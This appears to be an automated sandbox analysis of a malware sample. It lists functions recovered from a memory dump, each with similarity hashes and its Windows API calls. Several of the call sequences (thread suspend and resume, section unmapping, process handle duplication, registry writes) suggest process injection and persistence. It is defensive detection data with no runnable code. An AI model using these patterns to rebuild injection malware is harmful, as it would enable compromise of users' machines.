  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
